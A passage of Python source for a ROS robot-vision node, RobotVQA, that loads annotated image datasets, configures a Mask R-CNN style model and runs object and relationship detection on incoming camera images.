# 2- Setting of model hyperparameters
# 3- Data preparation and loading into memory
# 4- Training
# 5- Inference
# 6- Validation
# 7- Testing
# 8- Result visualization
#setting python paths
import sys
import os
import roslib
import rospkg
rospack = rospkg.RosPack()
packname=''
packname=rospack.get_path('robotvqa_visualizer')
sys.path.append(os.path.join(packname,'../models'))
sys.path.append(os.path.join(packname,'../tools'))
import visualize
from visualize import get_ax
import pickle
import glob
import random
import math
import re
import time
import numpy as np
import cv2
import mutex
import rospy
from PIL import Image
from std_msgs.msg import( String )
import cv_bridge
from sensor_msgs.msg import Image
from sensor_msgs.msg import CompressedImage
from cv_bridge import CvBridge
from DatasetClasses import DatasetClasses
from robotVQAConfig import RobotVQAConfig
import utils
import skimage
import json
#Select a GPU if working on Multi-GPU Systems
#Several GPUs can also be selected
#os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
#os.environ["CUDA_VISIBLE_DEVICES"] = "0"
import glob
from keras import backend as K
import robotVQA as modellib
#Scene Graph Server
from rs_robotvqa_msgs.srv import *
################# Extended DatasetLoader Class(EDLC) ###################
class ExtendedDatasetLoader(utils.Dataset):
"""Extend the generic Dataset class and override the following methods:
load_mask()
"""
def __init__(self):
super(self.__class__,self).__init__()
def normalize(self,s):
"""Capitalize first letter of string s
"""
s=s.rstrip().lstrip()
return s[0].upper()+s[1:]
def register_images(self,folders,imgNameRoot,annotNameRoot,depthNameRoot,config,with_depth=True,high_depth=True):
"""get all image files that pass the filter
inputs:
mode: how to build the dataset: from a dataset file(file) or from a raw dataset(data) made up of images and annotations
For a quick access to large dataset, the latter is preloaded into a binary file
"""
classes=[[],[],[],[],[]]#for 5 output_features
nbfails=0
nbsuccess=0
for folder in folders:
annotation_filter=folder+'/'+annotNameRoot+'*.json'
annotations=glob.glob(annotation_filter)
#Add classes
rospy.loginfo('\nLoading classes from dataset ...\n')
for anot in annotations:
try:
with open(anot,'r') as infile:
jsonImage=json.load(infile)
infile.close()
for obj in jsonImage['objects']:
try:
cat=self.normalize(obj['objectName'])
col=self.normalize(obj['objectColor'])
sha=self.normalize(obj['objectShape'])
mat=self.normalize(obj['objectExternMaterial'])
opn=self.normalize(obj['objectOpenability'])
opn=self.normalize(config.OBJECT_OPENABILITY_DICO[opn])
if((cat in config.OBJECT_NAME_DICO) and (col in config.OBJECT_COLOR_DICO) and (sha in config.OBJECT_SHAPE_DICO) and \
(mat in config.OBJECT_MATERIAL_DICO) and (opn in list(config.OBJECT_OPENABILITY_DICO.values()))):
if cat not in classes[0]:
classes[0].append(cat)
if col not in classes[1]:
classes[1].append(col)
if sha not in classes[2]:
classes[2].append(sha)
if mat not in classes[3]:
classes[3].append(mat)
if opn not in classes[4]:
classes[4].append(opn)
nbsuccess+=1
except Exception as e:
rospy.logwarn('Data '+str(anot)+': An object could not be processed:'+str(e))
nbfails+=1
except Exception as e:
rospy.logwarn('Data '+str(anot)+' could not be processed:'+str(e))
nbfails+=1
rospy.loginfo('\n',nbsuccess,' Objects successfully found and ',nbfails,' Objects failed!', '\n')
rospy.loginfo('\nClasses found:',classes, '\n')
rospy.loginfo('\nRegistering classes ...\n')
for feature_id in range(config.NUM_FEATURES-2):
for i in range(len(classes[feature_id])):
self.add_class(feature_id,"robotVQA",i+1,classes[feature_id][i])
rospy.loginfo('\nAdding object relationships ...\n')
#Add relationships
feature_id=5
for i in range(config.NUM_CLASSES[feature_id]-1):
self.add_class(feature_id,"robotVQA",i+1,self.normalize(list(config.OBJECT_RELATION_DICO.keys())[i]))
rospy.loginfo('\nAdding relationship categories ...\n')
#Add relationship categories
feature_id=6
for i in range(config.NUM_CLASSES[feature_id]-1):
self.add_class(feature_id,"robotVQA",i+1,self.normalize(list(config.RELATION_CATEGORY_DICO.values())[i]))
rospy.loginfo('\nAdding images ...\n')
k=-1
for folder in folders:
image_filter=folder+'/'+imgNameRoot+'*.*'
images=glob.glob(image_filter)
#Add images
for i in range(len(images)):
k+=1
index=images[i].split(imgNameRoot)[1].split('.')[0]
annotationPath=folder+'/'+annotNameRoot+index+'.json'
if high_depth:
depthPath=folder+'/'+depthNameRoot+index+'.exr'
else:
depthPath=folder+'/'+depthNameRoot+index+'.jpg'
try:
image = skimage.io.imread(images[i])
if (os.path.exists(depthPath) or (not with_depth) ) and os.path.exists(annotationPath):
self.add_image("robotVQA",k,images[i],depthPath=depthPath,annotPath=annotationPath,dataFolder=folder,shape=image.shape)
except Exception as e:
rospy.logerr('Image '+str(images[i])+' could not be registered:'+str(e))
rospy.loginfo('\nImages found in'+folder+':',len(images), '\n')
del classes[:]
def reduce_relation(self,relation):
x=np.count_nonzero(relation,axis=2)
x=np.count_nonzero(x,axis=0)+np.count_nonzero(x,axis=1)
return x.nonzero()
def make_transition(self,relation):
N,C=relation.shape[1:]
for c in range(C):
stable=False
while not stable:
stable=True
for i in range(N):
for j in range(N):
for k in range(N):
if(relation[i][j][c]==relation[j][k][c] and relation[i][j][c]!=0 and relation[i][j][c]!=relation[i][k][c]):
relation[i][k][c]=relation[i][j][c]
stable=False
return relation
def load_mask(self, image_id,config):
"""Generate instance masks for objects of the given image ID.
"""
info = self.image_info[image_id]
annotationPath = info['annotPath']
shape=info['shape']
shape=[shape[0],shape[1]]
mask=[]
pose=[]
nbfail=0
nbsuccess=0
classes=[[],[],[],[],[]]
id_name_map=[]
try:
with open(annotationPath,'r') as infile:
jsonImage=json.load(infile)
infile.close()
img=np.zeros(shape,dtype='uint8')
for obj in jsonImage['objects']:
try:
cat=self.normalize(obj['objectName'])
col=self.normalize(obj['objectColor'])
sha=self.normalize(obj['objectShape'])
mat=self.normalize(obj['objectExternMaterial'])
opn=self.normalize(obj['objectOpenability'])
ori=np.array(obj['objectLocalOrientation'],dtype='float32')
#normalize angles to principal ones
ori[0]=utils.principal_angle(ori[0])
ori[1]=utils.principal_angle(ori[1])
ori[2]=utils.principal_angle(ori[2])
pos=np.array(obj['objectLocalPosition'],dtype='float32')
opn=self.normalize(config.OBJECT_OPENABILITY_DICO[opn])
#check that objects are defined in the right bound
assert abs(pos[0])<=config.MAX_OBJECT_COORDINATE and \
abs(pos[1])<=config.MAX_OBJECT_COORDINATE and \
abs(pos[2])<=config.MAX_OBJECT_COORDINATE
if((cat in config.OBJECT_NAME_DICO) and (col in config.OBJECT_COLOR_DICO) and (sha in config.OBJECT_SHAPE_DICO) and \
(mat in config.OBJECT_MATERIAL_DICO) and (opn in list(config.OBJECT_OPENABILITY_DICO.values()))):
id_name_map.append(obj['objectId'])
classes[0].append(cat)
classes[1].append(col)
classes[2].append(sha)
classes[3].append(mat)
classes[4].append(opn)
img=img*0
for cord in obj['objectSegmentationPixels']:
img[cord[0]][cord[1]]=1
mask.append(img.copy())
#register poses with normalization
pose.append(np.array(list(ori)+list(utils.getPositionFromCamToImg(pos)),dtype='float32'))
nbsuccess+=1
except Exception as e:
nbfail+=1
rospy.loginfo('\n\n',nbsuccess,'/',nbsuccess+nbfail,' Object(s) found!')
nbInstances=len(mask)
shape.append(nbInstances)
rospy.loginfo('\nShape:\n',shape)
masks=np.zeros(shape,dtype='uint8')
poses=np.zeros([nbInstances,6],dtype='float32')
relations=np.zeros([nbInstances,nbInstances,DatasetClasses.NUM_CLASSES[6]-1],dtype='int32')
for i in range(nbInstances):
masks[:,:,i]=mask[i].copy()
poses[i,:]=pose[i].copy()
del mask[:]
del pose[:]
for j in range(len(classes)):
for i in range(len(classes[j])):
classes[j][i]=self.class_names[j].index(classes[j][i])
classes[j]=np.array(classes[j],dtype='int32')
for rel in jsonImage['objectRelationship']:
try:
if(rel['object1'] in id_name_map) and (rel['object2'] in id_name_map):
relations[id_name_map.index(rel['object1'])][id_name_map.index(rel['object2'])][self.class_names[6].index(config.OBJECT_RELATION_DICO[self.normalize(rel['relation'])])-1]=self.class_names[5].index(self.normalize(rel['relation']))
except Exception as e:
rospy.logerr('An object relationship could not be processed: '+str(e))
del id_name_map[:]
#Further processing if there are relations
if relations.sum()!=0.:
#augment dataset through transitivity property of relations
#relations=self.make_transition(relations)
#only select objects participating in a relationship
valid_obj=self.reduce_relation(relations)
#take away all non valid objects masks,poses,...
relations=relations.take(valid_obj[0],axis=1).take(valid_obj[0],axis=0)
masks=masks.take(valid_obj[0],axis=2)
poses=poses.take(valid_obj[0],axis=0)
for i in range(len(classes)):
classes[i]=classes[i].take(valid_obj[0],axis=0)
#merge all relation categories into a single one
z=np.where(relations[:,:,2]>0)
relations[:,:,1][z]=(relations[:,:,2][z])
z=np.where(relations[:,:,1]>0)
relations[:,:,0][z]=(relations[:,:,1][z])
return masks,classes,poses,relations[:,:,0]
except Exception as e:
rospy.logerr('\n\n Data '+str(annotationPath)+' could not be processed:'+str(e))
return super(self.__class__,self).load_mask(image_id)
################ EXtended Model Configuration Class(EMCC)##############
class ExtendedRobotVQAConfig(RobotVQAConfig):
"""Configuration for training on the specific robotVQA dataset.
Derives from the base Config class and overrides values specific
to the robotVQA dataset.
"""
# Give the configuration a recognizable name
NAME = "robotVQA"
# Train on 1 GPU and 1 image per GPU. We can put multiple images on each
# GPU because the images are small. Batch size is 1 (GPUs * images/GPU).
GPU_COUNT = 1
IMAGES_PER_GPU = 1
#Number of target feature
NUM_FEATURES=DatasetClasses.NUM_FEATURES
#Target features
FEATURES_INDEX=DatasetClasses.FEATURES_INDEX
# Number of classes per features(object's category/name, color, shape, material, openability) (including background)
NUM_CLASSES =DatasetClasses.NUM_CLASSES # background + 3 shapes
#categories
OBJECT_NAME_DICO=DatasetClasses.OBJECT_NAME_DICO
#colors
OBJECT_COLOR_DICO=DatasetClasses.OBJECT_COLOR_DICO
#shape
OBJECT_SHAPE_DICO=DatasetClasses.OBJECT_SHAPE_DICO
#material
OBJECT_MATERIAL_DICO=DatasetClasses.OBJECT_MATERIAL_DICO
#openability
OBJECT_OPENABILITY_DICO=DatasetClasses.OBJECT_OPENABILITY_DICO
#object relationships
OBJECT_RELATION_DICO=DatasetClasses.OBJECT_RELATION_DICO
#relationship categories
RELATION_CATEGORY_DICO=DatasetClasses.RELATION_CATEGORY_DICO
#Max Object Coordinate in cm
MAX_OBJECT_COORDINATE=DatasetClasses.MAX_OBJECT_COORDINATE
#Max CAMERA_CENTER_TO_PIXEL_DISTANCE in m for attaching useless(not in the system's focus: reduce scope of view) objects
MAX_CAMERA_CENTER_TO_PIXEL_DISTANCE=DatasetClasses.MAX_CAMERA_CENTER_TO_PIXEL_DISTANCE
# Learning rate and momentum
# The Mask RCNN paper uses lr=0.02, but on TensorFlow it causes
# weights to explode. Likely due to differences in optimzer
# implementation.
LEARNING_RATE = 0.001
LEARNING_MOMENTUM = 0.9
# Weight decay regularization
WEIGHT_DECAY = 0.000001
# Use small images for faster training. Set the limits of the small side
# the large side, and that determines the image shape.
IMAGE_MIN_DIM = DatasetClasses.IMAGE_MIN_DIM
IMAGE_MAX_DIM = DatasetClasses.IMAGE_MAX_DIM
# Use smaller anchors because our image and objects are small
RPN_ANCHOR_SCALES = (16, 32, 64, 128,256) # anchor side in pixels
# Reduce training ROIs per image because the images are small and have
# few objects. Aim to allow ROI sampling to pick 33% positive ROIs.
TRAIN_ROIS_PER_IMAGE =20
# Maximum number of ground truth instances to use in one image
MAX_GT_INSTANCES = 20
# Max number of final detections
DETECTION_MAX_INSTANCES = 20
# ROIs kept after non-maximum supression (training and inference)
POST_NMS_ROIS_TRAINING = 2000
POST_NMS_ROIS_INFERENCE = 1000
# Use a small epoch since the data is simple
STEPS_PER_EPOCH = 10
#Number of epochs
NUM_EPOCHS=1000
# use small validation steps since the epoch is small
VALIDATION_STEPS = 500
#LEARNING RATE CONTROLLER
REL_ALPHA1=0.9999
REL_ALPHA2=0.0001
# Use RPN ROIs or externally generated ROIs for training
# Keep this True for most situations. Set to False if you want to train
# the head branches on ROI generated by code rather than the ROIs from
# the RPN. For example, to debug the classifier head without having to
# train the RPN.
USE_RPN_ROIS = True
# Non-max suppression threshold to filter RPN proposals.
# You can reduce this during training to generate more propsals.
RPN_NMS_THRESHOLD = 0.6
# Non-maximum suppression threshold for detection
DETECTION_NMS_THRESHOLD = 0.3
# Input image size:RGBD-Images
IMAGE_SHAPE = [DatasetClasses.IMAGE_MAX_DIM, DatasetClasses.IMAGE_MAX_DIM, DatasetClasses.IMAGE_MAX_CHANNEL]
#Object Poses' Boundaries for normalizing objects'poses
#poses are normalized to [0,1[
MAX_OBJECT_POSES=DatasetClasses.MAX_OBJECT_POSES
#Object Orientation Normalization Factor. Angles belong to [0,2pi[
#Amgles are normalized to [0,1[
ANGLE_NORMALIZED_FACTOR=DatasetClasses.ANGLE_NORMALIZED_FACTOR
# Image mean (RGB)
MEAN_PIXEL = DatasetClasses.MEAN_PIXEL
# With depth information?
WITH_DEPTH_INFORMATION=False
#processor's names
GPU0='/gpu:0'
GPU1='/gpu:1'
GPU2='/gpu:2'
GPU3='/gpu:3'
CPU0='/cpu:0'
#Numbers of threads
NUMBER_THREADS=14
#Layers to exclude on very first training with a new weights file
EXCLUDE=None
"""
EXCLUDE=["robotvqa_class_logits0", "robotvqa_class_logits1","robotvqa_class_logits2","robotvqa_class_logits3","robotvqa_class_logits4",
"robotvqa_class_logits5_1",'robotvqa_class_logits5_2','robotvqa_class_bn2','robotvqa_class_conv2',
"mrcnn_bbox_fc","mrcnn_bbox","robotvqa_poses_fc", "robotvqa_poses",
"robotvqa_poses_fc0","robotvqa_poses_fc1","robotvqa_poses_fc2",
"mrcnn_mask","robotvqa_class0","robotvqa_class1","robotvqa_class2","robotvqa_class3","robotvqa_class4","robotvqa_class5"]
"""
################ Task Manager Class(TMC)##############
class TaskManager(object):
###################################################################
def __init__(self):
try:
#Ros Node
rospy.init_node('robotvqa')
rospy.loginfo('Starting Ros Node RobotVQA ...')
rospy.on_shutdown(self.cleanup)
self.TempImageFile=rospy.get_param('sharedImageFile','TempImageFile.jpg')
self.TempImageFile1=rospy.get_param('sharedImageFile1','TempImageFile1.jpg')
self.mainTempImageFile=rospy.get_param('sharedmainImageFile','mainTempImageFile.jpg')
#attributes
self.cvImageBuffer=[]
self.INDEX=-1
self.INSTANCEINDEX=0
if rospy.get_param('videomode','local')=='local':
self.cvMode='rgb8'
else:
self.cvMode='bgr8'
self.wait=True
self.mutex=mutex.mutex()
self.mutex2=mutex.mutex()
self.mutex3=mutex.mutex()
self.mutex4=mutex.mutex()
self.total=0
self.frequency=30
self.counter=0
self.success=0
self.currentImage1=[] #current image: Server
self.currentImage =[] #current image: Pervasive
self.iheight=rospy.get_param('input_height',480)
self.iwidth=rospy.get_param('input_width',640)
self.height=rospy.get_param('output_height',1000)
self.width=rospy.get_param('output_width',1000)
self.color_hint=rospy.get_param('color_hint',"")
self.server_name=rospy.get_param('server_name',"/get_scene_graph")
self.model=None
self.color_hints={"":Image, "Compressed":CompressedImage, "raw":Image, "Raw":Image, "compressed":CompressedImage}
self.bridge = CvBridge()
rospy.logwarn('RobotVQA initialized!!!')
# Root directory of the project
self.ROOT_DIR = rospy.get_param('root_dir',os.path.join(packname,'../../RobotVQA'))
# Directory to save logs and trained model
self.MODEL_DIR = rospy.get_param('model_dir',os.path.join(self.ROOT_DIR, 'logs1'))
# Local path to trained weights file
self.ROBOTVQA_WEIGHTS_PATH = rospy.get_param('weight_path',os.path.join(self.ROOT_DIR,"mask_rcnn_coco.h5"))
self.config = ExtendedRobotVQAConfig()#Model config
if not os.path.exists(self.ROBOTVQA_WEIGHTS_PATH):
rospy.loginfo('\nThe weight path '+str(self.ROBOTVQA_WEIGHTS_PATH)+' does not exists!!!\n')
rospy.loginfo('Root directory:'+str(self.ROOT_DIR) )
rospy.loginfo('Model directory:'+str(self.MODEL_DIR) )
rospy.loginfo('Weight path:'+str(self.ROBOTVQA_WEIGHTS_PATH))
self.config.display()
#load the training set's cartography
rospy.loginfo('Getting Dataset ...')
binary_dataset_path=rospy.get_param('binary_dataset_path',os.path.join(self.ROOT_DIR,'dataset/virtual_training_dataset(51000_Images).data'))
self.train_set=self.getDataset(binary_dataset=binary_dataset_path)
#result_path: Where should the output of RobotVQA be saved?
self.result_path=rospy.get_param('result_path',self.ROOT_DIR+'/result')
rospy.loginfo('Starting RobotVQA core ...')
#Start Inference
self.inference(self.train_set,result_path=self.result_path)
#service
self.getSceneGraph=rospy.Service(self.server_name, GetSceneGraph, self.syncImageProcessing)
#subscribers
topic=rospy.get_param('input_topic','/RoboSherlock/input_image')
self.sub = rospy.Subscriber(topic,self.color_hints[self.color_hint],self.asyncImageProcessing)
rospy.loginfo('\nTaskManager started successfully\n')
rospy.logwarn('\nWaiting for images ... '+str(topic)+'\n')
except Exception as e:
rospy.loginfo('\n Starting TaskManager failed: ',e.args[0],'\n')
sys.exit(-1)
###################################################################
def resize(self,images,meanSize1,meanSize2):
normImages=[]
try:
for i in range(len(images)):
if(images[i].shape[0]*images[i].shape[1]<meanSize1*meanSize2):
normImages.append(np.array(cv2.resize(images[i].copy(),(meanSize1,meanSize2),
interpolation=cv2.INTER_LINEAR),dtype='uint8'))#enlarge
else:
normImages.append(np.array(cv2.resize(images[i].copy(),(meanSize1,meanSize2),
interpolation=cv2.INTER_AREA),dtype='uint8'))#shrink
rospy.loginfo('Resizing of images successful')
except:
rospy.logwarn('Failed to normalize/resize dataset')
return normImages
###################################################################
def cleanup(self):
rospy.logwarn('Shutting down RobotVQA node ...')
###################################################################
def showImages(self):
k=0
while self.mutex.testandset():
pass
if len(self.currentImage)>0:
cv2.imshow("Streaming-World",self.currentImage)
while True:
while self.mutex2.testandset():
k = cv2.waitKey(1) & 0xFF
if k==27:
cv2.destroyWindow("Streaming-World")
if not self.wait:
break
self.mutex2.unlock()
self.mutex.unlock()
###################################################################
def getDataset(self,folder=[DatasetClasses.DATASET_FOLDER], imgNameRoot=DatasetClasses.LIT_IMAGE_NAME_ROOT, annotNameRoot=DatasetClasses.ANNOTATION_IMAGE_NAME_ROOT,depthNameRoot=DatasetClasses.DEPTH_IMAGE_NAME_ROOT,binary_dataset=os.path.join(DatasetClasses.DATASET_FOLDER,DatasetClasses.DATASET_BINARY_FILE), with_depth=True,high_depth=True):
try:
with open(binary_dataset,'rb') as f:
return pickle.load(f)
except Exception as exc:
try:
dataset=ExtendedDatasetLoader()
dataset.register_images(folder,imgNameRoot,annotNameRoot,depthNameRoot,self.config,with_depth=with_depth,high_depth=high_depth)
dataset.prepare()
return dataset
except Exception as e:
rospy.logerr('Dataset creation failed: '+str(e))
return None
###################################################################
def visualize_dataset(self,dataset,nbImages):
try:
image_ids = np.random.choice(dataset.image_ids, nbImages)
for image_id in image_ids:
image = dataset.load_image(image_id,0)[:,:,:3]
mask, class_ids = dataset.load_mask(image_id)
visualize.display_top_masks(image, mask, class_ids, dataset.class_names)
except Exception as e:
rospy.logerr('Error-Could not visualize dataset: '+str(e))
###################################################################
def train(self,train_set,val_set,init_with='last',depth='float32',op_type='training'):
#config= should be adequately set for training
#op_type= training or validation.
model = modellib.RobotVQA(mode="training", config=self.config,
model_dir=self.MODEL_DIR)
self.model=model
#Weights initialization imagenet, coco, or last
if init_with == "imagenet":
model_path=model.get_imagenet_weights()
model.load_weights(model_path, by_name=True)
elif init_with == "coco":
# Load weights trained on MS COCO, but skip layers that
# are different due to the different number of classes
# See README for instructions to download the COCO weights
model_path=self.ROBOTVQA_WEIGHTS_PATH
model.load_weights(model_path, by_name=True,
exclude=ExtendedRobotVQAConfig.EXCLUDE)
elif init_with == "last":
# Load the last model you trained and continue training
model_path=model.find_last()[1]
model.load_weights(model_path, by_name=True)
rospy.loginfo('Weights loaded successfully from '+str(model_path))
#Train progressively all the segments of the networks
#Training loop
model.train(train_set, val_set,learning_rate=self.config.LEARNING_RATE, epochs=self.config.NUM_EPOCHS,layers='all',depth=depth,op_type=op_type)
#save weights after training
model_path = os.path.join(self.MODEL_DIR, "robotVQA.h5")
model.keras_model.save_weights(model_path)
rospy.loginfo('Training terminated successfully!')
###################################################################
def inference(self,dst,init_with='last',result_path=None):
#set config for inference properly
self.config.GPU_COUNT = 1
self.config.IMAGES_PER_GPU = 1
self.model = modellib.RobotVQA(mode="inference",config=self.config,model_dir=self.MODEL_DIR)
#Weights initialization imagenet, coco, or last
if init_with == "imagenet":
model_path=self.model.get_imagenet_weights()
self.model.load_weights(model_path, by_name=True,exclude=ExtendedRobotVQAConfig.EXCLUDE)
elif init_with == "coco":
# Load weights trained on MS COCO, but skip layers that
# are different due to the different number of classes
# See README for instructions to download the COCO weights
model_path=self.ROBOTVQA_WEIGHTS_PATH
self.model.load_weights(model_path, by_name=True,
exclude=ExtendedRobotVQAConfig.EXCLUDE)
elif init_with == "last":
# Load the last model you trained and continue training
model_path=self.model.find_last()[1]
self.model.load_weights(model_path, by_name=True)
self.model.keras_model._make_predict_function()
rospy.loginfo('Weights loaded successfully from '+str(model_path))
###################################################################
"""
def asyncImageProcessing(self,image):
try:
if self.counter<self.frequency:
self.counter+=1
else:
self.counter=0
while self.mutex2.testandset():
pass
self.wait=False
self.mutex2.unlock()
while self.mutex.testandset():
pass
dst=self.train_set
self.currentImage = self.bridge.imgmsg_to_cv2(image, self.cvMode)
while self.mutex3.testandset():
pass
self.currentImage1=self.currentImage[:]
self.mutex3.unlock()
b=self.currentImage[:,:,0].copy()
self.currentImage[:,:,0]=self.currentImage[:,:,2].copy()
self.currentImage[:,:,2]=b.copy()
self.currentImage = self.resize([self.currentImage],self.iwidth,self.iheight)[0]
cv2.imwrite(self.TempImageFile,self.currentImage)
rospy.loginfo('Buffering of current image successful')
image = utils.load_image(self.TempImageFile,None,self.config.MAX_CAMERA_CENTER_TO_PIXEL_DISTANCE)
#predict
rospy.logwarn(image.shape)
results = self.model.detect([image], verbose=0)
r=results[0]
class_ids=[r['class_cat_ids'],r['class_col_ids'],r['class_sha_ids'],r['class_mat_ids'],r['class_opn_ids'],r['class_rel_ids']]
scores=[r['scores_cat'],r['scores_col'],r['scores_sha'],r['scores_mat'],r['scores_opn'],r['scores_rel']]
visualize.display_instances(image[:,:,:3], r['rois'], r['masks'], class_ids, dst.class_names,r['poses'],[],[],get_ax(cols=2), scores=scores,\
title='Object description',title1='Object relationships',result_path=self.result_path+'/'+self.TempImageFile)
resImage=cv2.imread(self.result_path+'/'+self.TempImageFile)
if(len(resImage)>0):
self.currentImage =resImage.copy()
#self.currentImage = self.resize([self.currentImage],self.width,self.height)[0]
#self.showImages()
rospy.loginfo('Inference terminated!!!')
self.wait=True
self.mutex.unlock()
except Exception as e:
rospy.logwarn(' Failed to buffer image '+str(e))
"""
###################################################################
def asyncImageProcessing(self,image):
try:
if self.counter<self.frequency:
self.counter+=1
else:
self.counter=0
while self.mutex2.testandset():
pass
self.wait=False
self.mutex2.unlock()
while self.mutex.testandset():
pass
dst=self.train_set
self.currentImage = self.bridge.imgmsg_to_cv2(image, self.cvMode)
while self.mutex3.testandset():
pass
self.currentImage1=self.currentImage[:]
self.mutex3.unlock()
b=self.currentImage[:,:,0].copy()
self.currentImage[:,:,0]=self.currentImage[:,:,2].copy()
self.currentImage[:,:,2]=b.copy()
self.currentImage = self.resize([self.currentImage],self.iwidth,self.iheight)[0]
cv2.imwrite(self.TempImageFile,self.currentImage)
rospy.loginfo('Buffering of current image successful')
image = utils.load_image(self.TempImageFile,None,self.config.MAX_CAMERA_CENTER_TO_PIXEL_DISTANCE)
#predict
rospy.logwarn(image.shape)
R=image[:,:,0].copy()
G=image[:,:,1].copy()
B=image[:,:,2].copy()
image0=np.stack((R.copy()*0,G.copy(),B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image0=np.flip(image,0)
image1=np.stack((R.copy(),B.copy(),G.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image1=np.flip(image,1)
image2=np.stack((B.copy(),G.copy(),R.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image2=np.flip(image1,0)
image3=np.stack((B.copy(),R.copy(),G.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image3=np.flip(image0,1)
image4=np.stack((G.copy(),R.copy(),B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image4=self.resize([np.rot90(image,1)],self.iwidth,self.iheight)[0]
image5=np.stack((G.copy(),B.copy(),R.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image5=self.resize([np.rot90(image,3)],self.iwidth,self.iheight)[0]
image6=np.stack((R.copy(),G.copy()*0,B.copy(),image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image6=image-30
image7=np.stack((R.copy(),G.copy(),B.copy()*0,image[:,:,3].copy(),image[:,:,4].copy(),image[:,:,5].copy(),image[:,:,6]),axis=2)#image7=image+30
#images=[image0.copy(),image1.copy(),image2.copy(),image3.copy(),image.copy(),image4.copy(),image5.copy(),image6.copy(),image7.copy()]
images=[image]
rImages=[]
main_ax=get_ax(cols=2)
main_mask=[]
main_back=[]
list_results=[]
merge_results={"class_ids":[],"scores":[],"boxes":[],"poses":[],"masks":[]}
while self.mutex4.testandset():
pass
for image in images:
results = self.model.detect([image], verbose=0)
list_results.append(results)
r=results[0]
class_ids=[r['class_cat_ids'],r['class_col_ids'],r['class_sha_ids'],r['class_mat_ids'],r['class_opn_ids'],r['class_rel_ids']]
scores=[r['scores_cat'],r['scores_col'],r['scores_sha'],r['scores_mat'],r['scores_opn'],r['scores_rel']]
merge_results["class_ids"].append(class_ids)
merge_results["scores"].append(scores)
merge_results["boxes"].append(r['rois'])
merge_results["poses"].append(r['poses'])
merge_results["masks"].append(r['masks'])
# visualize.display_instances(image[:,:,:3], r['rois'], r['masks'], class_ids, dst.class_names,r['poses'],[],[],get_ax(cols=2), scores=scores,\
# title='Object description',title1='Object relationships',result_path=self.result_path+'/'+self.TempImageFile)
# title='Object description',title1='Object relationships',result_path=self.result_path+'/'+self.TempImageFile)
self.mutex4.unlock()
rospy.loginfo("****************************** BEGIN MERGING **************************************************")
listOfObjects,spatialRelations=self.merge_results_fct(merge_results,dst.class_names)
print(listOfObjects,spatialRelations)
rospy.loginfo("****************************** END MERGING **************************************************")
visualize.display_instances_v2(images[0][:,:,:3], listOfObjects, spatialRelations,main_ax,score=True,title="",title1='',
figsize=(16, 16),result_path=self.result_path+'/'+self.mainTempImageFile)
#for i in range(len(list_results)):
# results=list_results[i]
# image=images[i]
# r=results[0]
# class_ids=[r['class_cat_ids'],r['class_col_ids'],r['class_sha_ids'],r['class_mat_ids'],r['class_opn_ids'],r['class_rel_ids']]
# scores=[r['scores_cat'],r['scores_col'],r['scores_sha'],r['scores_mat'],r['scores_opn'],r['scores_rel']]
# visualize.display_instances(image[:,:,:3], r['rois'], r['masks'], class_ids, dst.class_names,r['poses'],[],[],get_ax(cols=2), scores=scores,\
# title='Object description',title1='Object relationships',result_path=self.result_path+'/'+self.TempImageFile)
# rImages.append(self.resize([cv2.imread(self.result_path+'/'+self.TempImageFile)],self.width/3,self.height/3)[0])
#rImages.append(self.resize([cv2.imread(self.result_path+'/'+self.mainTempImageFile)],3*(self.width/3),3*(self.height/3))[0])
#resImage=np.concatenate(( np.concatenate((rImages[0],rImages[1],rImages[4]),axis=0) , np.concatenate((rImages[2],rImages[3],rImages[7]),axis=0),np.concatenate((rImages[5],rImages[6],rImages[8]),axis=0) ),axis=1)
#resImage= rImages[0].copy()
resImage=cv2.imread(self.result_path+'/'+self.mainTempImageFile)
if(len(resImage)>0):
self.currentImage =resImage.copy()
#self.currentImage = self.resize([self.currentImage],self.width,self.height)[0]
#self.showImages()
rospy.loginfo('Inference terminated!!!')
self.wait=True
self.mutex.unlock()
except Exception as e:
rospy.logwarn(' Failed to buffer image '+str(e))
################################################################################################
def IOU(self,r1,r2):
y1,x1,y2,x2=map(float,r1)
yp1,xp1,yp2,xp2=map(float,r2)
if abs(x1-x2)==0 or abs(y1-y2)==0 or abs(xp1-xp2)==0 or abs(yp1-yp2)==0:
return 0
if yp1>=y2 or y1>=yp2 or xp1>=x2 or x1>=xp2:
return 0.0 #no intersection
if y1>=yp1:
if x1<=xp1:
return (abs(y1-min([y2,yp2]))*abs(xp1-min([x2,xp2])))/(abs(x1-x2)*abs(y1-y2)+abs(xp1-xp2)*abs(yp1-yp2)-abs(y1-min([y2,yp2]))*abs(xp1-min([x2,xp2])))
else:
return (abs(y1-min([y2,yp2]))*abs(x1-min([x2,xp2])))/(abs(x1-x2)*abs(y1-y2)+abs(xp1-xp2)*abs(yp1-yp2)-abs(y1-min([y2,yp2]))*abs(x1-min([x2,xp2])))
if yp1>=y1:
if xp1<=x1:
return (abs(yp1-min([yp2,y2]))*abs(x1-min([xp2,x2])))/(abs(xp1-xp2)*abs(yp1-yp2)+abs(x1-x2)*abs(y1-y2)-abs(yp1-min([yp2,y2]))*abs(x1-min([xp2,x2])))
else:
return (abs(yp1-min([yp2,y2]))*abs(xp1-min([xp2,x2])))/(abs(xp1-xp2)*abs(yp1-yp2)+abs(x1-x2)*abs(y1-y2)-abs(yp1-min([yp2,y2]))*abs(xp1-min([xp2,x2])))
################################################################################################
def merge_results_fct(self,results,class_names,mainSource=0):
listOfObjects=[]
#get all objects
n=len(results["class_ids"])
m=max([-1]+map((lambda x:x.shape[0]),results["poses"]))
if m<0:
m=0
mapObjectTocluster=np.zeros([n,m],dtype="int")
for i in range(len(results["class_ids"])):
for j in range(results["poses"][i].shape[0]):
listOfObjects.append({"cat":(results["class_ids"][i][0][j],results["scores"][i][0][j]),
